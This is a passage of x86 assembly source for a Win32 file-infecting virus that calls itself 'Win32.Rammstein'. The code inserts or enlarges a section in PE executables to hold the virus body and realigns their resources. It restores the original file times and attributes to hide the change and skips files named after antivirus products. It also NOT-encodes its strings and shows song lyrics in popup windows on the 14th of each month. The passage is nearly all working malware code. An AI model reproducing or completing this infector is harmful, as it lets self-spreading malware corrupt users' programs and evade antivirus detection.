last_size_ok: ;if the size is ok, then
mov ebx, [esi.SH_PointerToRawData] ;retrieve the pointer to
or ebx, ebx ;raw data. If it is 0
jz consider_eof ;take eof, otherwise add
add ebx, eax ;it to obtain the pos.
xchg ebx, eax ;
cmp eax, [ebp+filesize] ;if it exceedes the file
ja consider_eof ;size also consider EOF.
;
save_it: ;
mov [ebp+last_section_destination], eax ;save last section pointer
mov eax, [esi.SH_VirtualAddress] ;
mov esi, [ebp+optionalheader] ;
mov ebx, [esi.OH_DataDirectory.DE_BaseReloc.DD_VirtualAddress]
cmp eax, ebx ;
jne not_relocations ;
mov [ebp+situation], RELOCATIONS_LAST ;
jmp done_last ;
;
not_relocations: ;
mov ebx, [esi.OH_DataDirectory.DE_Resource.DD_VirtualAddress]
cmp eax, ebx ;
jne no_resources ;
mov [ebp+situation], RESOURCES_LAST ;
jmp done_last ;
;
no_resources: ;
mov [ebp+situation], WE_ARE_LAST ;
;
done_last: ;
popa ;
ret ;
;
add_new_section: ;
pusha ;save all
mov eax, 123h ;choose some random
call brandom32 ;increasement
add eax, virussize ;
mov [ebp+newraw], eax ;save new raw
call align_to_filealign ;
mov [ebp+newsize], eax ;save new aligned size
;
mov esi, [ebp+optionalheader] ;
mov ecx, [ebp+numberofrva] ;
add esi, [ebp+sizeofoptionalheader] ;
sub esi, 8 ;
mov eax, 0EEEEEEEEh ;
;
choose_smallest_directory_va: ;
mov ebx, [esi] ;
or ebx, ebx ;
jz go_to_next ;
cmp eax, ebx ;
ja found_smaller_va ;
jmp go_to_next ;
;
found_smaller_va: ;
mov eax, ebx ;
;
go_to_next: ;
sub esi, 8 ;
loop choose_smallest_directory_va ;
;
mov [ebp+smallest_dir_va], eax ;
sub eax, IMAGE_SIZEOF_SECTION_HEADER ;
add eax, [ebp+haddress] ;
;
mov esi, [ebp+lastsectionheader] ;go to last section header
mov ecx, IMAGE_SIZEOF_SECTION_HEADER ;
;
mov ebx, esi ;
add ebx, ecx ;
add ebx, ecx ;
cmp ebx, eax ;
ja its_not_ok ;
;
mov edi, esi ;
add edi, ecx ;
mov eax, edi ;can we insert a new
sub eax, [ebp+haddress] ;section header?
add eax, IMAGE_SIZEOF_SECTION_HEADER ;
cmp eax, [ebp+lowest_section_raw] ;
jb its_ok ;
;
its_not_ok: ;
popa ;
stc ;
ret ;
;
its_ok: ;
rep movsb ;and make a copy of it
;
mov eax, [ebp+sizeofheaders] ;
sub edi, [ebp+haddress] ;
cmp edi, eax ;
jbe ok_header_size ;
add eax, IMAGE_SIZEOF_SECTION_HEADER ;
call align_to_filealign ;
mov [ebp+sizeofheaders], eax ;
;
ok_header_size: ;
cmp [ebp+situation], WE_ARE_LAST ;are we at end?
jne not_last ;
;
mov esi, [ebp+lastsectionheader] ;if yes, then we
mov ebx, [esi.SH_VirtualAddress] ;rearrange the last header
mov eax, [ebp+last_section_destination] ;
sub eax, [esi.SH_PointerToRawData] ;
call align_to_filealign ;
add ebx, eax ;
add esi, IMAGE_SIZEOF_SECTION_HEADER ;
mov [esi.SH_VirtualAddress], eax ;
call set_our_sizes ;and set our sizes
jmp done_adding ;
;
not_last: ;if we are not last, we
mov eax, [ebp+filesize] ;
sub eax, [esi.SH_PointerToRawData] ;must rearrange both
mov ecx, eax ;headers
mov esi, [esi.SH_PointerToRawData] ;
mov [ebp+last_section_destination], esi ;
add esi, [ebp+haddress] ;
add esi, eax ;
mov edi, esi ;
add edi, [ebp+newsize] ;
std ;
rep movsb ;and move the last section
cld ;below our new section
mov esi, [ebp+lastsectionheader] ;
call set_our_sizes ;
mov ebx, [esi.SH_VirtualAddress] ;
add ebx, [esi.SH_SizeOfRawData] ;
add esi, IMAGE_SIZEOF_SECTION_HEADER ;
mov eax, [ebp+newsize] ;
add [esi.SH_PointerToRawData], eax ;
mov eax, ebx ;
call align_to_sectionalign ;
mov [esi.SH_VirtualAddress], eax ;
mov esi, [ebp+optionalheader] ;
;
cmp [ebp+situation], RESOURCES_LAST ;check if we must fix
jne then_relocs ;resources
;
mov [esi.OH_DataDirectory.DE_Resource.DD_VirtualAddress], ebx
call RealignResources ;
jmp done_adding ;
;
then_relocs: ;
mov [esi.OH_DataDirectory.DE_BaseReloc.DD_VirtualAddress], ebx
call RealignRelocs ;
jmp done_adding ;
;
set_our_sizes: ;
call set_our_name ;
mov eax, [ebp+newraw] ;set our new raw size
mov [esi.SH_VirtualSize], eax ;and our virtual size
call align_to_filealign ;
mov [esi.SH_SizeOfRawData], eax ;
mov [esi.SH_Characteristics], IMAGE_SCN_MEM_WRITE+IMAGE_SCN_MEM_READ+\
IMAGE_SCN_CNT_INITIALIZED_DATA
ret ;
;
done_adding: ;
popa ;
clc ;
ret ;
;
set_our_name: ;
pusha ;
push esi ;
mov esi, [ebp+optionalheader] ;
add esi, [ebp+sizeofoptionalheader] ;
mov ecx, [ebp+numberofsections] ;
mov ebx, section_names_number ;
;
compare_names: ;
push ecx ;
lea edi, [ebp+section_names] ;
mov ecx, section_names_number ;
;
compare: ;
inc edi ;
push ecx esi edi ;
mov ecx, 8 ;
rep cmpsb ;
je mark_it ;
;
next_name: ;
pop edi esi ecx ;
add edi, 8 ;
loop compare ;
jmp next_section ;
;
mark_it: ;
mov byte ptr [edi-9], 0 ;
dec ebx ;
pop edi esi ecx ;
jmp next_section ;
;
next_section: ;
add esi, IMAGE_SIZEOF_SECTION_HEADER ;
pop ecx ;
loop compare_names ;
;
or ebx, ebx ;
jz choose_safe ;
mov eax, ebx ;
call brandom32 ;
lea edi, [ebp+section_names] ;
sub edi, 9 ;
mov ecx, eax ;
or ecx, ecx ;
jnz choose_name ;
add edi, 9 ;
jmp done_choosing ;
;
choose_name: ;
add edi, 9 ;
cmp byte ptr [edi], 1 ;
je looping ;
inc ecx ;don't count it
;
looping: ;
loop choose_name ;
;
done_choosing: ;
inc edi ;
pop esi ;
xchg esi, edi ;
mov ecx, 8 ;
rep movsb ;
popa ;
ret ;
;
choose_safe: ;
lea edi, [ebp+safe] ;
jmp done_choosing ;
;
section_names: ;our new section not so
db 1, "DATA" , 0, 0, 0, 0 ;random name...
db 1, ".data" , 0, 0, 0 ;
db 1, ".idata", 0, 0 ;
db 1, ".udata", 0, 0 ;
db 1, "BSS" , 0, 0, 0, 0, 0 ;
db 1, ".rdata", 0, 0 ;
db 1, ".sdata", 0, 0 ;
db 1, ".edata", 0, 0 ;
section_names_number = ($-offset section_names)/9 ;
safe db 0,0,0,0,0,0,0,0 ;
;
increase_last_section: ;
mov [ebp+method], METHOD_INCREASE_LAST ;
mov esi, [ebp+lastsectionheader] ;
mov eax, [ebp+newraw] ;
add [esi.SH_SizeOfRawData], eax ;
mov eax, [ebp+newsize] ;
add [esi.SH_VirtualSize], eax ;
mov eax, [ebp+last_section_destination] ;
add eax, [ebp+haddress] ;
mov [ebp+finaldestination], eax ;
or [esi.SH_Characteristics], IMAGE_SCN_MEM_WRITE+IMAGE_SCN_MEM_READ
ret ;
;
CalculateDelta:
mov esi, [ebp+lastsectionheader] ;go to last section
mov eax, [esi.SH_VirtualAddress] ;and calculate the
add esi, IMAGE_SIZEOF_SECTION_HEADER ;RVA delta
sub eax, [esi.SH_VirtualAddress] ;
neg eax ;
ret ;
;
RealignResources: ;
call CalculateDelta ;
mov [ebp+DeltaRVA], eax ;
mov esi, dword ptr [esi.SH_PointerToRawData]; Point the resources
add esi, dword ptr [ebp+haddress] ; and align in memo
mov edi, esi ; save in edi
add edi, IMAGE_RESOURCE_DIRECTORY_SIZE ; skip resource dir
call parse_resource_directory ; parse all
ret ;
;
parse_resource_directory: ;
xor ecx, ecx ;
mov cx, word ptr [esi.RD_NumberOfNamedEntries]; NamedEntries+IdEntries
add cx, word ptr [esi.RD_NumberOfIdEntries] ; is our counter
;
add esi, IMAGE_RESOURCE_DIRECTORY_SIZE ; skip resource dir
;
parse_this_one: ;
push ecx ; save counter
push esi ; save address
call parse_resource ; parse the dir
pop esi ; restore address
pop ecx ; restore counter
add esi, 8 ; get next entry
loop parse_this_one ; loop until cx=0
ret ; return
;
parse_resource: ;
mov eax, [esi.RDE_OffsetToData] ; get offset to data
mov esi, edi ; get base of resorurces
test eax, 80000000h ; is it a subdirectory?
jz data_is_resource ;
;
data_is_directory: ;
xor eax, 80000000h ; if it is a subdirectory
add esi, eax ; find it's address and
sub esi, 10h ;
call parse_resource_directory ; go to parse it too...
ret ;
;
data_is_resource: ; if it is data, then
add esi, eax ; find out it's address
sub esi, 10h ;
mov eax, dword ptr [ebp+DeltaRVA] ; and increment the offs
add dword ptr [esi.REDE_OffsetToData], eax ; to data with our Delta
ret ; and ret...
;
RealignRelocs: ;
ret ;
;
infection_succesfull: ;
mov [ebp+flag], 0 ;mark good infection
;
close_address: ;
call [ebp+_UnmapViewOfFile], [ebp+haddress] ;unmap view
;
close_map: ;
call [ebp+_CloseHandle], [ebp+hmap] ;close map object
;
close_file: ;
call [ebp+_SetFilePointer], [ebp+hfile], [ebp+filesize], 0, FILE_BEGIN
call [ebp+_SetEndOfFile], [ebp+hfile] ;set EOF
lea ebx, [ebp+filetime1] ;restore the file time
push ebx ;
add ebx, 8 ;
push ebx ;
add ebx, 8 ;
push ebx ;
push [ebp+hfile] ;
call [ebp+_SetFileTime] ;restore file time
call [ebp+_CloseHandle], [ebp+hfile] ;close file
;
finished: ;
call [ebp+_SetFileAttributesA], [ebp+filename], [ebp+fileattributes]
cmp [ebp+flag], 0 ;restore attributes
je succesfull_infection ;
;
failed_infection: ;
mov [ebp+fileopen], FALSE ;
popa ;
stc ;
ret ;
;
succesfull_infection: ;
mov [ebp+fileopen], FALSE ;
popa ;
clc ;
ret ;
;
choose_smaller: ;
cmp eax, ebx ;
ja get_ebx ;
ret ;
;
get_ebx: ;
xchg eax, ebx ;
ret ;
;
align_to_filealign: ;here are the aligning
mov ecx, [ebp+filealign] ;procedures
jmp align_eax ;
;
align_to_sectionalign: ;
mov ecx, [ebp+sectionalign] ;
;
align_eax: ;
push edx ;
xor edx, edx ;
div ecx ;
or edx, edx ;
jz $+3 ;
inc eax ;
mul ecx ;
pop edx ;
ret ;
;
InfectFile endp ;
;
fileattributes dd 0 ;
filesize dd 0 ;
filetime1 dq 0 ;
filetime2 dq 0 ;
filetime3 dq 0 ;
hfile dd 0 ;
hmap dd 0 ;
haddress dd 0 ;
flag dd 0 ;
additional dd 0 ;
peheader dd 0 ;
lastsectionheader dd 0 ;
last_section_destination dd 0 ;
codesectionraw dd 0 ;
codesectionheader dd 0 ;
finaldestination dd 0 ;
method dd 0 ;
pedata label ;
numberofsections dd 0 ; stored as dword!!
sizeofoptionalheader dd 0 ; stored as dword!!
addressofentrypoint dd 0 ;
_imagebase dd 0 ;
sectionalign dd 0 ;
filealign dd 0 ;
sizeofimage dd 0 ;
sizeofheaders dd 0 ;
checksum dd 0 ;
numberofrva dd 0 ;
baseofcode dd 0 ;
codesection dd 0 ;
codesectionsize dd 0 ;
lastsection dd 0 ;
lastsectionsize dd 0 ;
increasement dd 0 ;
codedelta dd 0 ;
optionalheader dd 0 ;
filename dd 0 ;
copying db 0 ;
lastsectionraw dd 0 ;
lastsectionrva dd 0 ;
codesectionrva dd 0 ;
codesource dd 0 ;
codedestin dd 0 ;
PayloadThreadID dd 0 ;
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;³ ÜÜÜ ÜÜÜ Ü Ü Ü ÜÜÜ ÜÜÜ ÜÜ ;
;³ ÛÜÛ ÛÜÛ ÛÜÛ Û Û Û ÛÜÛ Û Û ;
;³ Û Û Û Û ÛÜÜ ÛÜÛ Û Û ÛÜß ;
;³ ;
;
DoPayload: ;
cmp [ebp+firstgen], 1 ;
jne do_it_now ;
ret ;
do_it_now: ;
pusha ;
lea esi, [ebp+text_start] ;
mov ecx, list_len ;
call not_list ;
;
lea eax, [ebp+text_start] ;
mov [ebp+current], eax ;
call [ebp+_GetDC], 0 ;
mov [ebp+hdc], eax ;
lea ebx, [ebp+offset chars] ;
call [ebp+_GetCharWidthA], eax, "A", "Z", ebx
lea ebx, [ebp+offset textmetric] ;
call [ebp+_GetTextMetricsA], [ebp+hdc], ebx ;
call [ebp+_GetSystemMetrics], SM_CXFULLSCREEN
mov [ebp+xmax], eax ;
call [ebp+_GetSystemMetrics], SM_CYFULLSCREEN
mov [ebp+ymax], eax ;
;
xor eax, eax ;
mov ax, [ebp+textmetric.tmHeight] ;
add ax, [ebp+textmetric.tmAscent] ;
add ax, [ebp+textmetric.tmDescent] ;
shl eax, 1 ;
mov [ebp+ylength], eax ;
;
new_window: ;
mov edi, [ebp+current] ;
call [ebp+_lstrlen], edi ;
add edi, eax ;
inc edi ;
push eax ;
call [ebp+_lstrlen], edi ;
mov edi, [ebp+current] ;
cmp eax, [esp] ;
jb ok_len ;
add edi, [esp] ;
inc edi ;
xchg eax, [esp] ;
;
ok_len: ;
pop ecx ;
;
lea esi, [ebp+chars] ;
xchg edi, esi ;
mov [ebp+xlength], 0 ;
xor eax, eax ;
;
calculate_length: ;
lodsb ;
cmp al, "A" ;
jnb do_Z ;
;
estimate: ;
xor ebx, ebx ;
mov bx, [ebp+textmetric.tmAveCharWidth] ;
inc ebx ;
jmp compute ;
;
do_Z: cmp al, "Z" ;
jna do_chars ;
jmp estimate ;
;
do_chars: ;
sub eax, "A" ;
mov ebx, [edi+eax*4] ;
inc ebx ;
;
compute: ;
add [ebp+xlength], ebx ;
loop calculate_length ;
;
call [ebp+_GetModuleHandleA], 0 ; get our handle
mov [ebp+hInst], eax ; save it
;
mov [ebp+wc.wcxStyle], CS_HREDRAW+CS_VREDRAW+\;window style
CS_GLOBALCLASS+CS_NOCLOSE
lea eax, [ebp+offset WndProc] ;
mov [ebp+wc.wcxWndProc], eax ; window procedure
mov [ebp+wc.wcxClsExtra], 0 ; -
mov [ebp+wc.wcxWndExtra], 0 ; -
mov eax, [ebp+hInst] ;
mov [ebp+wc.wcxInstance], eax ; instance (handle)
;
call [ebp+_LoadIconA], [ebp+hInst], IDI_APPLICATION ; load our icon
mov [ebp+ourhIcon], eax ;
mov [ebp+wc.wcxIcon], eax ;
mov [ebp+wc.wcxSmallIcon], eax ;
;
call [ebp+_LoadCursorA], 0, IDC_ARROW ; load out cursor
mov [ebp+wc.wcxCursor], eax ;
;
mov [ebp+wc.wcxBkgndBrush], COLOR_WINDOW+1 ;
mov dword ptr [ebp+wc.wcxMenuName], NULL ; menu
lea eax, [ebp+szClassName] ;
mov dword ptr [ebp+wc.wcxClassName], eax ; class name
;
lea eax, [ebp+offset wc] ;
call [ebp+_RegisterClassExA], eax ; register the class!
;
mov eax, [ebp+xmax] ;
sub eax, [ebp+xlength] ;
call brandom32 ;
mov [ebp+xpos], eax ;
;
mov eax, [ebp+ymax] ;
sub eax, [ebp+ylength] ;
call brandom32 ;
mov [ebp+ypos], eax ;
;
lea eax, [ebp+offset szClassName] ;
lea ebx, [ebp+offset szTitleName] ;
call [ebp+_CreateWindowExA],ExtendedStyle,\; Create the Window!
eax,\ ;
ebx,\ ;
DefaultStyle,\ ;
[ebp+xpos],\ ;
[ebp+ypos],\ ;
[ebp+xlength],\ ;
[ebp+ylength],\ ;
0,\ ;
0,\ ;
[ebp+hInst],\ ;
0 ;
;
mov [ebp+newhwnd], eax ; save handle
;
call [ebp+_UpdateWindow], dword ptr [ebp+newhwnd]; and update it...
call [ebp+_InvalidateRect], dword ptr [ebp+newhwnd], 0, 0
;
msg_loop: ;
lea eax, [ebp+offset msg] ;
call [ebp+_GetMessageA], eax, 0, 0, 0 ; get a message
;
or ax, ax ; finish?
jz end_loop ;
;
lea eax, [ebp+offset msg] ;
call [ebp+_TranslateMessage], eax ; translate message
;
lea eax, [ebp+offset msg] ;
call [ebp+_DispatchMessageA], eax ; dispatch the message
;
jmp msg_loop ; do again
;
end_loop: ;
mov esi, [ebp+current] ;
@endsz ;
@endsz ;
lea eax, [ebp+offset text_end] ;
cmp esi, eax ;
jae finish_process ;
cmp [ebp+process_end], 1 ;did the victim finish?
je finish_process ;
mov [ebp+current], esi ;
jmp new_window ;
;
finish_process: ;
popa ;
ret ;
process_end dd 0 ;
;
;============================================================================
WndProc proc uses ebx edi esi,\ ; registers preserved
hwnd:DWORD, wmsg:DWORD, wparam:DWORD, lparam:DWORD ; parameters
LOCAL theDC:DWORD ;
;
call @@1 ;
@@1: ;
pop esi ;
sub esi, offset @@1 ;
;
cmp [wmsg], WM_PAINT ;
je wmpaint ;
cmp [wmsg], WM_DESTROY ; destory window
je wmdestroy ;
cmp [wmsg], WM_CREATE ; create window
je wmcreate ;
cmp [wmsg], WM_TIMER ;
jmp defwndproc ;
;
defwndproc: ;
call [esi+_DefWindowProcA], [hwnd], [wmsg], [wparam], [lparam] ; define
jmp finish ; the window
;
wmdestroy: ;
call [esi+_ShowWindow], [hwnd], SW_HIDE ;
call [esi+_KillTimer], [hwnd], [esi+htimer];
call [esi+_PostQuitMessage], 0 ; kill the window
xor eax, eax ;
jmp finish ;
;
wmpaint: ;
call [esi+_GetDC], [hwnd] ;
mov [theDC], eax ;
lea eax, [esi+offset lppaint] ;
call [esi+_BeginPaint], dword ptr [hwnd],\ ;
eax ;
push [esi+current] ;
call [esi+_lstrlen] ;
push eax ;
call [esi+_TextOutA], dword ptr [theDC], 1, 1,\
dword ptr [esi+current], eax;
pop eax ;
mov ebx, [esi+current] ;
add ebx, eax ;
inc ebx ;
push ebx ;
push ebx ;
call [esi+_lstrlen] ;
pop ebx ;
xor edx, edx ;
mov dx, [esi+textmetric.tmHeight] ;
call [esi+_TextOutA], dword ptr [theDC], 1, edx, ebx, eax
lea eax, [esi+offset lppaint] ;
call [esi+_EndPaint], dword ptr [hwnd], eax
jmp defwndproc ;
;
wmcreate: ;
lea eax, [esi+offset TimerProc] ;
call [esi+_SetTimer], dword ptr [hwnd], 1111h,\
dword ptr [esi+wintime],\ ;
eax ;
mov [esi+htimer], eax ;
jmp defwndproc ;
;
finish: ;
ret ;
WndProc endp ;
;
TimerProc proc uses ebx edi esi,\ ;
hwnd:DWORD, wmsg:DWORD, timerid:DWORD, dwtime:DWORD
;
call @@2 ;
@@2: ;
pop esi ;
sub esi, offset @@2 ;
;
mov eax, [esi+htimer] ;
cmp [timerid], eax ;
jne exittime ;
call [esi+_PostMessageA], [hwnd], WM_DESTROY, 0, 0
;
exittime: ;
ret ;
TimerProc endp ;
;
text_start: ;
noter <LA? MICH DEINE TRANE REITEN> ;
noter <UBERS KINN NACH AFRIKA> ;
;
noter <WIEDER IN DEN SCHOSS DER LOWIN> ;
noter <WO ICH EINST ZUHAUSE WAR> ;
;
noter <ZWISCHEN DEINE LANGEN BEINEN> ;
noter <SUCH DEN SCHNEE VOM LETZTEN JAHR> ;
;
noter <DOCH ES IST KEIN SCHNEE MEHR DA> ;
noter <..> ;
;
noter <LASS MICH DEINE TRANE REITEN> ;
noter <UBER WOLKEN OHNE GLUCK> ;
;
noter <DER GROSSE VOGEL SCHIEBT DEN KOPF> ;
noter <SANFT IN SEIN VERSTECK ZURUCK> ;
;
noter <ZWISCHEN DEINE LANGEN BEINEN> ;
noter <SUCH DEN SAND VOM LETZTEN JAHR> ;
;
noter <DOCH ES IST KEIN SAND MEHR DA> ;
noter <..> ;
;
noter <SEHNSUCHT VERSTECKT > ;
noter <SICH WIE EIN INSEKT> ;
;
noter <IM SCHLAFE MERKST DU NICHT> ;
noter <DA? ES DICH STICHT> ;
;
noter <GLUCKLICH WERD ICH NIRGENDWO> ;
noter <DER FINGER RUTSCHT NACH MEXIKO> ;
;
noter <DOCH ER VERSINKT IM OZEAN> ;
noter <SEHNSUCHT IST SO GRAUSAM> ;
;
noter <WOLLT IHR DAS BETT IN FLAMMEN SEHEN? > ;
noter <WOLLT IHR IN HAUT UND HAAREN UNTERGEHEN?>
;
noter <IHR WOLLT DOCH AUCH DEN DOLCH INS LAKEN STECKEN >
noter <IHR WOLLT DOCH AUCH DAS BLUT VOM DEGEN LECKEN >
;
noter <RAMMSTEIN!! RAMMSTEIN!! > ;
noter <RAMMSTEIN!! RAMMSTEIN!! > ;
;
noter <IHR SEHT DIE KREUZE AUF DEM KISSEN > ;
noter <IHR MEINT EUCH DARF DIE UNSCHULD KUSSEN >
;
noter <IHR GLAUBT ZU TOTEN WARE SCHWER > ;
noter <DOCH WO KOMMEN ALL DIE TOTEN HER > ;
;
noter <RAMMSTEIN!! RAMMSTEIN!! > ;
noter <RAMMSTEIN!! RAMMSTEIN!! > ;
;
noter <SEX IST EIN SCHLACHT > ;
noter <LIEBE IST KRIEG > ;
;
noter <RAMMSTEIN!! RAMMSTEIN!! > ;
noter <RAMMSTEIN!! RAMMSTEIN!! > ;
text_end: ;
list_len = $-offset text_start ;
;
wc STD_WINDOW <size STD_WINDOW,0,0,0,0,0,0,0,0,0,0,0>
wintime dd 4000 ;
hInst dd 0 ;
hAccel dd 0 ;
htimer dd 0 ;
ourhIcon dd 0 ;
newhwnd dd 0 ;
msg MSGSTRUCT <?> ;
r RECT <?> ;
lppaint PAINTSTRUCT <?> ;
textmetric TEXTMETRIC <?> ;
xmax dd 0 ;
ymax dd 0 ;
xlength dd 0 ;
ylength dd 0 ;
xpos dd 0 ;
ypos dd 0 ;
current dd 0 ;
hdc dd 0 ;
chars dd "Z"-"A"+2 dup (0) ;
szTitleName db 'Win32.Rammstein', 0 ;
szClassName db 'RAMMSTEIN', 0 ;
;
DefaultStyle = WS_OVERLAPPED+WS_VISIBLE ;
ExtendedStyle = WS_EX_TOPMOST ;
;
;==================================================;=========================
;
ValidateFile: ;
; ESI = pointer to filename ;
ret
pusha ;
lea eax, [ebp+VF_ExceptionExit] ; Setup a SEH frame
push eax ;
push dword ptr fs:[0] ;
mov fs:[0], esp ;
;
call [ebp+_lstrlen], esi ;get the filename length
cmp eax, 256 ;is it too big?
ja invalid_file ;
mov ecx, eax ;
;
push ecx ;uppercase the name
call [ebp+_CharUpperBuffA], esi, ecx ;
pop ecx ;
;
@endsz ;go to it's end
inc ecx ;
std ;
mov edi, esi ;and look backwards for
mov al,'\' ;the '\'
repnz scasb ;
mov esi, edi ;
or ecx, ecx ;
jz no_increase ;
inc esi ;if we found one, point it
inc esi ;
;
no_increase: ;
cld ;restore direction
lea edi, [ebp+offset avoid_list] ;our avoid list
;
search_next: ;
cmp byte ptr [edi], 0FFh ;last entry?
je all_names_ok ;
xor ebx, ebx ;
mov bl, [edi+4] ;get the name length
xor ecx, ecx ;
xchg byte ptr [esi+ebx], cl ;limit our string to the
push esi ;length with a 0
call StringCRC32 ;and compute a crc32 for
pop esi ;the piece...
xchg byte ptr [esi+ebx], cl ;restore filename
cmp eax, [edi] ;does it match?
je av_name_found ;
add edi, 5 ;get next...
jmp search_next ;
;
av_name_found: ;
invalid_file: ;
pop dword ptr fs:[0] ;and restore the SEH
add esp, 4 ;
popa ;
stc ;
ret ;
;
all_names_ok: ;
pop dword ptr fs:[0] ;and restore the SEH
add esp, 4 ;
popa ;
clc ;
ret ;
;
VF_ExceptionExit: ;if we had an error we
mov esp, [esp+8] ;must restore the ESP
call DeltaRecoverVF ;
DeltaRecoverVF: ;
pop ebp ;
sub ebp, offset DeltaRecoverVF ;
jmp invalid_file ;
;
avoid_list: ;
crc32 <AV> ;
db 3 ;
crc32 <_AV> ;the list with filenames
db 3 ;to avoid
crc32 <ALERT> ;
db 5 ;
crc32 <AMON> ;
db 4 ;
crc32 <N32> ;
db 3 ;
crc32 <NOD> ;
db 3 ;
crc32 <NPSSVC> ;
db 6 ;
crc32 <NSCHEDNT> ;
db 8 ;
crc32 <NSPLUGIN> ;
db 8 ;
crc32 <TB> ;
db 2 ;
crc32 <F-> ;
db 2 ;
crc32 <AW> ;
db 2 ;
crc32 <AV> ;
db 2 ;
crc32 <NAV> ;
db 3 ;
crc32 <PAV> ;
db 3 ;
crc32 <RAV> ;
db 3 ;
crc32 <NVC> ;
db 3 ;
crc32 <FPR> ;
db 3 ;
crc32 <DSS> ;
db 3 ;
crc32 <IBM> ;
db 3 ;
crc32 <INOC> ;
db 3 ;
crc32 <ANTI> ;
db 3 ;
crc32 <SCN> ;
db 3 ;
crc32 <SCAN> ;
db 4 ;
crc32 <VSAF> ;
db 3 ;
crc32 <VSWP> ;
db 3 ;
crc32 <PANDA> ;
db 3 ;
crc32 <DRWEB> ;
db 3 ;
crc32 <FSAV> ;
db 3 ;
crc32 <SPIDER> ;
db 3 ;
crc32 <ADINF> ;
db 3 ;
crc32 <EXPLORER> ;
db 8 ;
crc32 <SONIQUE> ;
db 7 ;
crc32 <SQSTART> ;
db 7 ;
crc32 <SMSS> ;
db 4 ;
crc32 <OUTLOOK> ;
db 7 ;
crc32 <PSTORES> ;
db 7 ;
db 0FFh ;
;
;
not_list proc ;
____1: cmp [ebp+copying], 1 ;syncronization
je ____1 ;
mov [ebp+in_list], 1 ;
push esi edi ;this NOTs a list
mov edi, esi ;
not_byte: ;
lodsb ;
not al ;
stosb ;
loop not_byte ;
pop edi esi ;
mov [ebp+in_list], 0 ;
ret ;
not_list endp ;
in_list db 0 ;
;
brandom32 proc ;this bounds eax
push edx ;between 0 and eax-1
push ecx ;on random basis
mov edx, 0 ;
push eax ;
call random32 ;
pop ecx ;
div ecx ;
xchg eax, edx ;
pop ecx ;
pop edx ;
ret ;
brandom32 endp ;
;
random32 proc ;this is a random nr
push edx ;generator. It's a
call [ebp+_GetTickCount] ;modified version of
rcl eax, 2 ;some random gen I found
add eax, 12345678h ;someday and it had
random_seed = dword ptr $-4 ;some flaws I fixed...
adc eax, esp ;
xor eax, ecx ;
xor [ebp+random_seed], eax ;
add eax, [esp-8] ;
rcl eax, 1 ;
pop edx ;
ret ;
random32 endp ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
check_not proc ;
pusha ;Be sure not to let
lea esi, [ebp+list_of_lists] ;some of the lists
;un-NOTed in the
get_another: ;victim file
lodsd ;
or eax, eax ;
jz correct ;
add eax, [ebp+finaldestination] ;
cmp byte ptr [eax], NOT "L" ;
je no_problem ;
call wrong ;
;
no_problem: ;
add esi, 4 ;
jmp get_another ;
;
correct: ;
popa ;
ret ;
;
wrong: ;
pusha ;
push eax ;
lodsd ;
pop esi ;
mov ecx, eax ;
call not_list ;
popa ;
ret ;
check_not endp ;
;
list_of_lists label ;
dd offset direct_list - offset start, direct_list_len
dd offset file_extensions - offset start, file_extensions_len
dd offset av_list - offset start, av_list_len
dd 0 ;
;
KillThread: ;
IF VIRUSNOTIFYEXIT ;
push 0 ;
call exittext1 ;
db 'Rammstein viral code end!', 0 ;
exittext1: ;
call exittext2 ;
db 'Rammstein viral code end!', 0 ;
exittext2: ;
push 0 ;
call [ebp+_MessageBoxA] ;
ENDIF ;
IF PAYLOAD ;
lea eax, [ebp+time] ;
call [ebp+_GetSystemTime], eax ;
lea edi, [ebp+time] ;
cmp word ptr [edi.ST_wDay], 14d ;
jne no_payload ;
call DoPayload ;
;
no_payload: ;
ENDIF ;
;
IF MAINTHREADSEH ;
jmp restore_main_seh ;host
;
MainExceptionExit: ;if we had an error we
mov esp, [esp+8] ;must restore the ESP
;
restore_main_seh: ;
pop dword ptr fs:[0] ;and restore the SEH
add esp, 4 ;returning to the host...
;
call restore_delta ;
restore_delta: ;
pop ebp ;
sub ebp, offset restore_delta ;
;
just_kill_it: ;
ENDIF
mov eax, [ebp+_ExitThread] ;Exit the main thread
push 0 ;
call eax ;
;
; Safe Copro. Thanx to Prizzy for pointing me that the copro cannot be shared
; in the same process and need to be saved to keep compatibility!
InitCopro: ;
sub esp, 128 ;create space for copro
fwait ;data, wait for last to
fnsave [esp] ;finish and save...
finit ;initialize copro
jmp dword ptr [esp+80h] ;and return
;
RestoreCopro: ;
fwait ;wait to finish
frstor [esp+4] ;restore copro data
xchg eax, dword ptr [esp] ;now find out our return
xchg eax, dword ptr [esp+80h] ;address without altering
xchg eax, dword ptr [esp] ;eax, kill the copro space
add esp, 128 ;on the stack. One Dword
ret ;remains on the stack
;
EPO_Routine: ;
clc ;
ret ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Data area ;
test_semaphore dd 0 ;
W32FD WIN32_FIND_DATA <?> ;
time SYSTEMTIME <0> ;
memory dd 0 ;
free_routine dd AVAILABLE ;
version db 0 ;
newsize dd 0 ;
newraw dd 0 ;
situation dd 0 ;
DeltaRVA dd 0 ;
mainthreadid dd 0 ;
headersum dd 0 ;
checksumfile dd 0 ;
lowest_section_raw dd 0 ;
apihookfinish dd 0 ;
tempcounter dd 0 ;
fileopen dd 0 ;
Semaphore db "Win32.Rammstein", 0 ;
saved_code dd 0, 0 ;
mmx dd 0 ;
skipper db 0 ;
no_imports db 0 ;
totalsizes dd 0 ;
smallest_dir_va dd 0 ;
netapis dd 0 ;
ok dd 0
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
include get_apis.inc ;included files
